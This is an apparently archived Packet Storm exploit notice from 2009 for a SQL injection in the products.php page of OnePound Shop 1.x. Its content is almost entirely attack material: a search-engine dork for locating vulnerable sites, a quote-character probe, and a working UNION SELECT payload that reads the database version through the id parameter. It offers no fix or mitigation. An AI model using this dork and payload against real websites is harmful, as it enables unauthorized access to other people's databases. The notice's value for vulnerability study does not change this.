Onepound Shop 1.x SQL Injection

2009-07-14T00:00:00
ID PACKETSTORM:79169
Type packetstorm
Reporter Affix
Modified 2009-07-14T00:00:00

Description

                                        
                                            `#################################################################  
# http://root-the.net #  
#################################################################  
#[+] onepound shop 1.x products.php SQL Injection Vulnerability #  
#[+] Vendor : onepound.cn <http://www.onepound.cn/> #  
#[+] Exploit : Affix <root@root-the.net> #  
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #  
# str0ke, tekto, SonicX, Android, tw0 #  
#[+] dork : "Powered by OnePound" #  
#################################################################  
  
Example :  
http://site.com/products.php?id='  
  
Demo :  
http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--  
  
  
`